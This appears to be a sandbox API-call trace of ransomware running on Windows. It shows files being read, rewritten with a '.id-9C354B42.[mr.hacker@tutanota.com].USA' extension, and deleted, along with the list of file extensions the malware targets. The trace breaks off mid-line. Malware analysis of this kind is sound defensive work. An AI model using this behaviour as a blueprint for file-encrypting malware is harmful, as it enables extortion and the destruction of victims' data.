[0273.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.921] lstrlenW (lpString=".doc") returned 4 [0273.921] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.921] lstrlenW (lpString=".docx") returned 5 [0273.921] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0273.921] lstrlenW (lpString=".pdf") returned 4 [0273.921] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.921] lstrlenW (lpString=".xls") returned 4 [0273.921] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.921] lstrlenW (lpString=".xlsx") returned 5 [0273.921] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0273.921] lstrlenW (lpString=".ppt") returned 4 [0273.921] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.921] lstrlenW (lpString=".zip") returned 4 [0273.921] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.921] lstrlenW (lpString=".rar") returned 4 [0273.921] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.922] lstrlenW (lpString=".bz2") returned 4 [0273.922] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.922] lstrlenW (lpString=".7z") returned 3 [0273.922] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.922] lstrlenW (lpString=".dbf") returned 4 [0273.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.922] lstrlenW (lpString=".1cd") returned 4 [0273.922] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63 [0273.922] lstrlenW (lpString=".jpg") returned 4 [0273.922] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.283] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=15145) returned 1 [0274.283] CloseHandle (hObject=0x380) returned 1 [0274.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg")) returned 0x20 [0274.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.321] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.321] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.321] GetLastError () returned 0x0 [0274.321] ReadFile (in: hFile=0x3c0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3b29, lpOverlapped=0x0) returned 1 [0274.349] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3b30, lpOverlapped=0x0) returned 1 [0274.350] ReadFile (in: hFile=0x3c0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.350] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.350] SetEndOfFile (hFile=0x39c) returned 1 [0274.350] CloseHandle (hObject=0x39c) returned 1 [0274.350] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.350] SetEndOfFile (hFile=0x3c0) returned 1 [0274.352] CloseHandle (hObject=0x3c0) returned 1 [0274.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg")) returned 1 [0274.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.353] lstrlenW (lpString=".doc") returned 4 [0274.353] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.353] lstrlenW (lpString=".docx") returned 5 [0274.353] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0274.353] lstrlenW (lpString=".pdf") returned 4 [0274.353] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.353] lstrlenW (lpString=".xls") returned 4 [0274.353] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.353] lstrlenW (lpString=".xlsx") returned 5 [0274.353] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0274.353] lstrlenW (lpString=".ppt") returned 4 [0274.353] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.353] lstrlenW (lpString=".zip") returned 4 [0274.353] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.353] lstrlenW (lpString=".rar") returned 4 [0274.353] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.353] lstrlenW (lpString=".bz2") returned 4 [0274.354] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.354] lstrlenW (lpString=".7z") returned 3 [0274.354] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.354] lstrlenW (lpString=".dbf") returned 4 [0274.354] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.354] lstrlenW (lpString=".1cd") returned 4 [0274.354] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63 [0274.354] lstrlenW (lpString=".jpg") returned 4 [0274.354] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.354] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=22356) returned 1 [0274.354] CloseHandle (hObject=0x3c0) returned 1 [0274.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf")) returned 0x20 [0274.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.355] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.355] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.355] GetLastError () returned 0x0 [0274.355] ReadFile (in: hFile=0x3c0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x5754, lpOverlapped=0x0) returned 1 [0274.379] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x5760, lpOverlapped=0x0) returned 1 [0274.380] ReadFile (in: hFile=0x3c0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.380] WriteFile (in: hFile=0x39c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.380] SetEndOfFile (hFile=0x39c) returned 1 [0274.380] CloseHandle (hObject=0x39c) returned 1 [0274.380] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.380] SetEndOfFile (hFile=0x3c0) returned 1 [0274.382] CloseHandle (hObject=0x3c0) returned 1 [0274.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf")) returned 1 [0274.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.492] lstrlenW (lpString=".doc") returned 4 [0274.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.492] lstrlenW (lpString=".docx") returned 5 [0274.492] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0274.492] lstrlenW (lpString=".pdf") returned 4 [0274.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.492] lstrlenW (lpString=".xls") returned 4 [0274.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.492] lstrlenW (lpString=".xlsx") returned 5 [0274.492] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0274.492] lstrlenW (lpString=".ppt") returned 4 [0274.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.493] lstrlenW (lpString=".zip") returned 4 [0274.493] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.493] lstrlenW (lpString=".rar") returned 4 [0274.493] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.493] lstrlenW (lpString=".bz2") returned 4 [0274.493] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.493] lstrlenW (lpString=".7z") returned 3 [0274.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.493] lstrlenW (lpString=".dbf") returned 4 [0274.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.493] lstrlenW (lpString=".1cd") returned 4 [0274.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned 63 [0274.493] lstrlenW (lpString=".jpg") returned 4 [0274.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 59 os_tid = 0x67c [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x608428 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x34c0048 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b34d0 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b37d8 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b34e8 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x35c0020 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3500 [0263.599] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3500, Size=0x20) returned 0x607a58 [0263.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3500 [0263.599] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3500, Size=0x20) returned 0x607a80 [0263.600] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.600] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.600] Wow64DisableWow64FsRedirection (in: OldValue=0x2e7ff58 | out: OldValue=0x2e7ff58*=0x0) returned 1 [0263.600] lstrlenW (lpString="kernel32.dll") returned 12 [0263.600] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607a58 | out: hHeap=0x520000) returned 1 [0263.600] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.600] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607a80 | out: hHeap=0x520000) returned 1 [0263.600] Sleep (dwMilliseconds=0x64) [0263.747] Sleep (dwMilliseconds=0x64) [0263.983] Sleep (dwMilliseconds=0x64) [0264.217] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.217] lstrlenW (lpString="join.avi") returned 8 [0264.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.308] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=222208) returned 1 [0264.308] CloseHandle (hObject=0x344) returned 1 [0264.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0264.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.309] lstrlenW (lpString=".doc") returned 4 [0264.309] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".docx") returned 5 [0264.309] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.309] lstrlenW (lpString=".pdf") returned 4 [0264.309] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".xls") returned 4 [0264.309] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".xlsx") returned 5 [0264.309] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.309] lstrlenW (lpString=".ppt") returned 4 [0264.309] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.309] lstrlenW (lpString=".zip") returned 4 [0264.309] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".rar") returned 4 [0264.309] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".bz2") returned 4 [0264.309] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString=".7z") returned 3 [0264.309] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.309] lstrlenW (lpString=".dbf") returned 4 [0264.309] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.309] lstrlenW (lpString=".1cd") returned 4 [0264.310] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.310] lstrlenW (lpString=".jpg") returned 4 [0264.310] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.310] lstrlenW (lpString=".doc") returned 4 [0264.310] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".docx") returned 5 [0264.310] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.310] lstrlenW (lpString=".pdf") returned 4 [0264.310] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".xls") returned 4 [0264.310] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".xlsx") returned 5 [0264.310] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.310] lstrlenW (lpString=".ppt") returned 4 [0264.310] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.310] lstrlenW (lpString=".zip") returned 4 [0264.310] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".rar") returned 4 [0264.310] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".bz2") returned 4 [0264.310] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.310] lstrlenW (lpString=".7z") returned 3 [0264.310] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.310] lstrlenW (lpString=".dbf") returned 4 [0264.310] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.311] lstrlenW (lpString=".1cd") returned 4 [0264.311] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0264.311] lstrlenW (lpString=".jpg") returned 4 [0264.311] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.311] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0264.311] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0264.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0264.722] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1600388) returned 1 [0264.722] CloseHandle (hObject=0x37c) returned 1 [0264.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0264.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.723] lstrlenW (lpString=".doc") returned 4 [0264.723] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString=".docx") returned 5 [0264.723] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.723] lstrlenW (lpString=".pdf") returned 4 [0264.723] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString=".xls") returned 4 [0264.723] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString=".xlsx") returned 5 [0264.723] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.723] lstrlenW (lpString=".ppt") returned 4 [0264.723] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.723] lstrlenW (lpString=".zip") returned 4 [0264.723] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString=".rar") returned 4 [0264.723] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0264.723] lstrlenW (lpString=".bz2") returned 4 [0264.723] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString=".7z") returned 3 [0264.724] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString=".dbf") returned 4 [0264.724] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString=".1cd") returned 4 [0264.724] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString=".jpg") returned 4 [0264.724] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString=".doc") returned 4 [0264.724] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString=".docx") returned 5 [0264.724] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0264.724] lstrlenW (lpString=".pdf") returned 4 [0264.724] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString=".xls") returned 4 [0264.724] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString=".xlsx") returned 5 [0264.724] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0264.724] lstrlenW (lpString=".ppt") returned 4 [0264.724] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0264.724] lstrlenW (lpString=".zip") returned 4 [0264.724] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0264.724] lstrlenW (lpString=".rar") returned 4 [0264.725] 